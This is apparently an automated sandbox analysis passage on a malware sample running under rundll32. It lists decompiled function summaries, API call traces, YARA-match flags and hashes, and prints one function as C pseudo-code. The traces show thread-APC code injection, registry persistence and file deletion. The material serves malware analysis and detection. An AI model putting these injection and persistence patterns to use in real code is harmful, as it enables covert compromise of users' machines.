                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                            • String ID:
                                            • API String ID: 1430934453-0
                                            • Opcode ID: db26b2de9a2a144ebf28e9e288ecb03084e513d81d55c23746835fba43be8a63
                                            • Instruction ID: b4602430e00017fc6456487956b3cd7b0b2075d7c7499efb13875dc63cf912e1
                                            • Opcode Fuzzy Hash: db26b2de9a2a144ebf28e9e288ecb03084e513d81d55c23746835fba43be8a63
                                            • Instruction Fuzzy Hash: E5515C71910209ABEFA1EBA5DC49EAB7FBDFF44214F005115FD05E21A0DB35AE41DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F26E7 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 55%
                                            			E049F26E7(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x49fa3dc; // 0x4f79c48
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E049F59CA();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E049F59CA();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E049F4B8D(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E049F4B8D(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E049F4480(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x49f918c;
						}
						_t70 = E049F22D6(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E049F4DF6(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x49fa348; // 0x57d5a8
								_t28 = _t105 + 0x49fbb08; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E049F4480(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x49f9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E049F4DF6(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E049F4C73(_v24);
								} else {
									_t92 =  *0x49fa348; // 0x57d5a8
									_t44 = _t92 + 0x49fbc80; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E049F4C73(_v8);
						}
						E049F4C73(_v12);
					}
					E049F4C73(_v16);
				}
				return _v28;
			}


































                                            0x049f26ed
                                            0x049f26f5
                                            0x049f26f8
                                            0x049f2705
                                            0x049f2708
                                            0x049f270f
                                            0x049f2716
                                            0x049f2719
                                            0x049f2726
                                            0x049f2729
                                            0x049f272c
                                            0x049f2731
                                            0x049f2736
                                            0x049f273e
                                            0x049f2743
                                            0x049f2748
                                            0x049f274e
                                            0x049f2752
                                            0x049f275b
                                            0x049f275f
                                            0x049f2761
                                            0x049f2761
                                            0x049f2769
                                            0x049f276e
                                            0x049f2773
                                            0x049f2779
                                            0x049f2780
                                            0x049f2791
                                            0x049f2798
                                            0x049f27aa
                                            0x049f27af
                                            0x049f27b4
                                            0x049f27bd
                                            0x049f27cf
                                            0x049f27e5
                                            0x049f27ea
                                            0x049f27ee
                                            0x049f27f2
                                            0x049f27f7
                                            0x049f27fc
                                            0x049f27fe
                                            0x049f27fe
                                            0x049f2808
                                            0x049f2811
                                            0x049f2818
                                            0x049f2834
                                            0x049f2838
                                            0x049f2871
                                            0x049f283a
                                            0x049f283d
                                            0x049f2845
                                            0x049f2856
                                            0x049f285e
                                            0x049f2866
                                            0x049f286a
                                            0x049f286a
                                            0x049f2838
                                            0x049f2879
                                            0x049f2879
                                            0x049f2881
                                            0x049f2881
                                            0x049f2889
                                            0x049f2889
                                            0x049f2895

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 049F26FF
                                            • lstrlen.KERNEL32(00000000,00000005), ref: 049F2780
                                            • lstrlen.KERNEL32(?), ref: 049F2791
                                            • lstrlen.KERNEL32(00000000), ref: 049F2798
                                            • lstrlenW.KERNEL32(80000002), ref: 049F279F
                                            • wsprintfW.USER32 ref: 049F27E5
                                            • lstrlen.KERNEL32(?,00000004), ref: 049F2808
                                            • lstrlen.KERNEL32(?), ref: 049F2811
                                            • lstrlen.KERNEL32(?), ref: 049F2818
                                            • lstrlenW.KERNEL32(?), ref: 049F281F
                                            • wsprintfW.USER32 ref: 049F2856
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                            • String ID:
                                            • API String ID: 822878831-0
                                            • Opcode ID: fec7a1f3921c9eff13fac614690193828f92ba880719fdf16454132c4778492a
                                            • Instruction ID: f0709cfbd9f443d97f43041958fc59530c7ce807be6cda7f1e323e550e0a4ebb
                                            • Opcode Fuzzy Hash: fec7a1f3921c9eff13fac614690193828f92ba880719fdf16454132c4778492a
                                            • Instruction Fuzzy Hash: 6B519D72D00219BBDF11AFA4DC44ADE7BB5EF84358F058075EA04A7220DB35EA21DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05809ECE Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05809F04
                                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 05809F19
                                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 05809F41
                                            • HeapFree.KERNEL32(00000000,?), ref: 05809F82
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05809F92
                                            • RtlAllocateHeap.NTDLL(00000000,0581782C), ref: 05809FA5
                                            • RtlAllocateHeap.NTDLL(00000000,0581782C), ref: 05809FB4
                                            • HeapFree.KERNEL32(00000000,00000000,?,0581782C,00000000,?,?,?), ref: 05809FFE
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0581782C,00000000,?,?,?,?), ref: 0580A022
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0581782C,00000000,?,?,?), ref: 0580A047
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0581782C,00000000,?,?,?), ref: 0580A05C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Allocate$CloseCreate
                                            • String ID:
                                            • API String ID: 4126010716-0
                                            • Opcode ID: 172ec0db17ea90e2e61807d611bd82a7e8bf2ac59ccbf5e4e18656cbec4c8c88
                                            • Instruction ID: f8657c3f685ad67d2bdd0bceafc448880bc14558717d22f8833f7b09dd211a78
                                            • Opcode Fuzzy Hash: 172ec0db17ea90e2e61807d611bd82a7e8bf2ac59ccbf5e4e18656cbec4c8c88
                                            • Instruction Fuzzy Hash: 8E51BEB680020DEFDF519FA4DC858EEBFB9FB08314F10846AFA06A2160D7315E949F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058169E1 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PathFindFileNameW.SHLWAPI(?), ref: 058169FB
                                            • PathFindFileNameW.SHLWAPI(?), ref: 05816A11
                                            • lstrlenW.KERNEL32(00000000), ref: 05816A54
                                            • RtlAllocateHeap.NTDLL(00000000,05822F1D), ref: 05816A6A
                                            • memcpy.NTDLL(00000000,00000000,05822F1B), ref: 05816A7D
                                            • _wcsupr.NTDLL ref: 05816A89
                                            • lstrlenW.KERNEL32(?,05822F1B), ref: 05816AC2
                                            • RtlAllocateHeap.NTDLL(00000000,?,05822F1B), ref: 05816AD7
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 05816AED
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05816B13
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05816B22
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                            • String ID:
                                            • API String ID: 3868788785-0
                                            • Opcode ID: 0c995938a01c2b193e50b197c3913c178e240d9f8e90e7e7899f949d2e62cbb8
                                            • Instruction ID: ac1bf8a0af2fdfd9567aa2927aa6d4bcce185ab1775c6d7a05788044ce71d79f
                                            • Opcode Fuzzy Hash: 0c995938a01c2b193e50b197c3913c178e240d9f8e90e7e7899f949d2e62cbb8
                                            • Instruction Fuzzy Hash: 12312832214204ABD630AF76AC8996B7FEDFF48310B14851DFE46D3550EF30AC848B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05812E58 Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05812E7C
                                              • Part of subcall function 0580B0A5: RegCloseKey.ADVAPI32(?), ref: 0580B12C
                                            • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 05812EAB
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 05812EBC
                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05812EF6
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000004,00000004), ref: 05812F18
                                            • RegCloseKey.ADVAPI32(?), ref: 05812F21
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 05812F37
                                            • HeapFree.KERNEL32(00000000,?), ref: 05812F4C
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05812F60
                                            • HeapFree.KERNEL32(00000000,?), ref: 05812F75
                                            • RegCloseKey.ADVAPI32(?), ref: 05812F7E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                            • String ID:
                                            • API String ID: 534682438-0
                                            • Opcode ID: ab10e0aabe34c788168ce21ca16a614659f49c3f84ff6cf1c8caf99a3035405e
                                            • Instruction ID: 1c2faf1618c70e90511bcb8d8eca788e08d64304b9bc114c9695b620b311bf98
                                            • Opcode Fuzzy Hash: ab10e0aabe34c788168ce21ca16a614659f49c3f84ff6cf1c8caf99a3035405e
                                            • Instruction Fuzzy Hash: B3311775610108BFDF21AFA5EC89DAE7FB9FB48701B148025FE06D2120DB32AA85DF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581026E Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05810285
                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094), ref: 05810297
                                            • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094), ref: 058102A4
                                            • wsprintfA.USER32 ref: 058102BF
                                            • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0580B047,00000000,00000094,00000000), ref: 058102D5
                                            • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 058102EE
                                            • WriteFile.KERNEL32(00000000,00000000), ref: 058102F6
                                            • GetLastError.KERNEL32 ref: 05810304
                                            • CloseHandle.KERNEL32(00000000), ref: 0581030D
                                            • GetLastError.KERNEL32(?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094,00000000), ref: 0581031E
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094), ref: 0581032E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                            • String ID:
                                            • API String ID: 3873609385-0
                                            • Opcode ID: 3b40152af432781664d36df56426a1ea64868f2686e329087a38dd52f0776269
                                            • Instruction ID: 09277fde7866afd936997bf5bb2066091383138692ec9b54f42e63c6afa495a7
                                            • Opcode Fuzzy Hash: 3b40152af432781664d36df56426a1ea64868f2686e329087a38dd52f0776269
                                            • Instruction Fuzzy Hash: F611C072111218BFE630AB64AC8DEBB3E9CEB45365F008024FD06C2150DE212CC48676
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05801A49 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 05801A7A
                                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 05801A8D
                                            • StrTrimA.SHLWAPI(?,?), ref: 05801AB0
                                            • StrTrimA.SHLWAPI(00000001,?), ref: 05801ABF
                                            • lstrlen.KERNEL32(?), ref: 05801AF4
                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05801B07
                                            • lstrcpy.KERNEL32(00000004,?), ref: 05801B25
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 05801B49
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                            • String ID: W
                                            • API String ID: 1974185407-655174618
                                            • Opcode ID: 122c1a93d66724fc31f87dc498351372aa6ceb189d3d7b39aba8e9d2cbaeac76
                                            • Instruction ID: 854f7f2228adbfeea94db3efc377a52acc091154ca1167b6d0aedb1e5384067e
                                            • Opcode Fuzzy Hash: 122c1a93d66724fc31f87dc498351372aa6ceb189d3d7b39aba8e9d2cbaeac76
                                            • Instruction Fuzzy Hash: C1318D35910218BBDB60AFA9CC49EAA7FB9EF48720F009016FC05D7250EB74AD40CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581BC40 Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0581BCB7
                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0581BCD6
                                              • Part of subcall function 05813672: wsprintfA.USER32 ref: 05813685
                                              • Part of subcall function 05813672: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05813697
                                              • Part of subcall function 05813672: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 058136C1
                                              • Part of subcall function 05813672: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 058136D4
                                              • Part of subcall function 05813672: CloseHandle.KERNEL32(?), ref: 058136DD
                                            • GetLastError.KERNEL32 ref: 0581BFA9
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0581BFB9
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0581BFCA
                                            • RtlExitUserThread.NTDLL(?), ref: 0581BFD8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                            • String ID:
                                            • API String ID: 1258333524-0
                                            • Opcode ID: f627b1f59efe3ce002ba9b95d5ccf86cde6962f00cd6c67fdf59fadd26f89efd
                                            • Instruction ID: ff2bb8d2ec16518b357e810a2cb174be9953cf6489f28bb5af57344cd0e9db82
                                            • Opcode Fuzzy Hash: f627b1f59efe3ce002ba9b95d5ccf86cde6962f00cd6c67fdf59fadd26f89efd
                                            • Instruction Fuzzy Hash: C7B119B1500309AFDB309F65CC88EAA7BAEFF08346F108529FD5AD2160EB70AD558F15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580C49E Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(05D7CBB8,00000000,00000000,00000000,?), ref: 0580C4C1
                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 0580C4D0
                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 0580C4DD
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0580C4F5
                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 0580C501
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580C51D
                                            • wsprintfA.USER32 ref: 0580C5FF
                                            • memcpy.NTDLL(00000000,00004000,?), ref: 0580C64C
                                            • InterlockedExchange.KERNEL32(05829148,00000000), ref: 0580C66A
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580C6AB
                                              • Part of subcall function 0581C301: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0581C32A
                                              • Part of subcall function 0581C301: memcpy.NTDLL(00000000,?,?), ref: 0581C33D
                                              • Part of subcall function 0581C301: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581C34E
                                              • Part of subcall function 0581C301: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581C363
                                              • Part of subcall function 0581C301: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0581C39B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                            • String ID:
                                            • API String ID: 4198405257-0
                                            • Opcode ID: 33c0d6489692bb962382a82c8bbee584ffc70748d74ffe74d839d4eb3fadf3ec
                                            • Instruction ID: 3681e9e486c8ae7d3f5adc2be92a554aec810ff44690c3168f7b6aed50f8cee0
                                            • Opcode Fuzzy Hash: 33c0d6489692bb962382a82c8bbee584ffc70748d74ffe74d839d4eb3fadf3ec
                                            • Instruction Fuzzy Hash: D7615B71A00209AFDF60DFA5CC89EAA7FA9FF48204F048129FC16D7290DB74AD54CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05806130 Relevance: 15.1, APIs: 10, Instructions: 98filememorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058129F2: memset.NTDLL ref: 05812A14
                                              • Part of subcall function 058129F2: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05812ABE
                                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 05806178
                                            • CloseHandle.KERNEL32(?), ref: 05806184
                                            • PathFindFileNameW.SHLWAPI(?), ref: 05806194
                                            • lstrlenW.KERNEL32(00000000), ref: 0580619D
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058061AE
                                            • wcstombs.NTDLL ref: 058061BD
                                            • lstrlen.KERNEL32(?), ref: 058061CA
                                            • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 05806209
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580621C
                                            • DeleteFileW.KERNEL32(?), ref: 05806229
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                            • String ID:
                                            • API String ID: 2256351002-0
                                            • Opcode ID: b89024d7af31d6207f06b5d6342c58bce122d3d842624fd032acd81745746a6c
                                            • Instruction ID: 0903e1b5167715a6eeb6acdd664439afb07e204edf934e66d53d387e591a545b
                                            • Opcode Fuzzy Hash: b89024d7af31d6207f06b5d6342c58bce122d3d842624fd032acd81745746a6c
                                            • Instruction Fuzzy Hash: B2313931911219ABDF219FA6DC4AE9F3F79FF84311F008025FD02E2160EB319A65DB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580BD6D Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 0580BD7D
                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,05829208,00000003,00000000,00000000,?,?,00000000), ref: 0580BD9A
                                            • GetLastError.KERNEL32(?,?,00000000), ref: 0580BE42
                                              • Part of subcall function 05819C23: lstrlen.KERNEL32(?,00000000,?,00000027,05829208,?,00000000,?,?,?,?,?,0580BDC2,?,00000001), ref: 05819C59
                                              • Part of subcall function 05819C23: lstrcpy.KERNEL32(00000000,00000000), ref: 05819C7D
                                              • Part of subcall function 05819C23: lstrcat.KERNEL32(00000000,00000000), ref: 05819C85
                                            • GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 0580BDCD
                                            • CreateFileMappingA.KERNEL32(00000000,05829208,00000002,00000000,00000000,?), ref: 0580BDE1
                                            • lstrlen.KERNEL32(?,?,?,00000000), ref: 0580BDFD
                                            • lstrcpy.KERNEL32(?,?), ref: 0580BE0D
                                            • GetLastError.KERNEL32(?,?,00000000), ref: 0580BE15
                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0580BE28
                                            • CloseHandle.KERNEL32(?,?), ref: 0580BE3A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                            • String ID:
                                            • API String ID: 194907169-0
                                            • Opcode ID: 741b03c5d379a746c725795705cdcfef6851e7c1980f3f17f9daf1f35cffb7af
                                            • Instruction ID: 317d86aef4794675bfb30900e0b3069420b886048be13b1ae6dde09a281f9e91
                                            • Opcode Fuzzy Hash: 741b03c5d379a746c725795705cdcfef6851e7c1980f3f17f9daf1f35cffb7af
                                            • Instruction Fuzzy Hash: 71210871900208FFDB609FA4DC49A9E7FB9FB04355F108469FE56E2260DB30AE948F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05805DA0 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNEL32(?), ref: 05805DC6
                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05805DD2
                                            • GetModuleHandleA.KERNEL32(?,05D7978E), ref: 05805DF2
                                            • GetProcAddress.KERNEL32(00000000), ref: 05805DF9
                                            • Thread32First.KERNEL32(?,0000001C), ref: 05805E09
                                            • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 05805E24
                                            • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 05805E35
                                            • CloseHandle.KERNEL32(00000000), ref: 05805E3C
                                            • Thread32Next.KERNEL32(?,0000001C), ref: 05805E45
                                            • CloseHandle.KERNEL32(?), ref: 05805E51
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                            • String ID:
                                            • API String ID: 2341152533-0
                                            • Opcode ID: 28eaa475e3ec6d6bee109857d9bb727af17a7081b08cb383fc11c34da244af58
                                            • Instruction ID: ab5f3046c394539de35ed95e446fbed3ea8e1b5d690f5fd9b7ee67ef2dc1f2f1
                                            • Opcode Fuzzy Hash: 28eaa475e3ec6d6bee109857d9bb727af17a7081b08cb383fc11c34da244af58
                                            • Instruction Fuzzy Hash: 03214D72900118AFDF11AFE5DC89DAE7FBDFB08251B008026FE15E6190DB319D458B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580608A Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetEvent.KERNEL32(?,?,0581F846), ref: 0580609F
                                              • Part of subcall function 0581FDDB: InterlockedExchange.KERNEL32(05815593,000000FF), ref: 0581FDE2
                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0581F846), ref: 058060BF
                                            • CloseHandle.KERNEL32(00000000,?,0581F846), ref: 058060C8
                                            • CloseHandle.KERNEL32(00000000,?,?,0581F846), ref: 058060D2
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 058060DA
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 058060F2
                                            • Sleep.KERNEL32(000001F4), ref: 05806101
                                            • CloseHandle.KERNEL32(?), ref: 0580610E
                                            • LocalFree.KERNEL32(?), ref: 05806119
                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 05806123
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                            • String ID:
                                            • API String ID: 1408595562-0
                                            • Opcode ID: 885db0e5c0dc2ee017900d9e2e7215359e700b2ba3d37923e2612b026424bd51
                                            • Instruction ID: ea504673eae5cabc8e05af5b2d6e5c1e07c797460f000c2941893f6f06cbcb8e
                                            • Opcode Fuzzy Hash: 885db0e5c0dc2ee017900d9e2e7215359e700b2ba3d37923e2612b026424bd51
                                            • Instruction Fuzzy Hash: B7116D31244716DFCFB0AB66DC4995BBFA9FF042147019814FA42D34A0EF31F8508B21
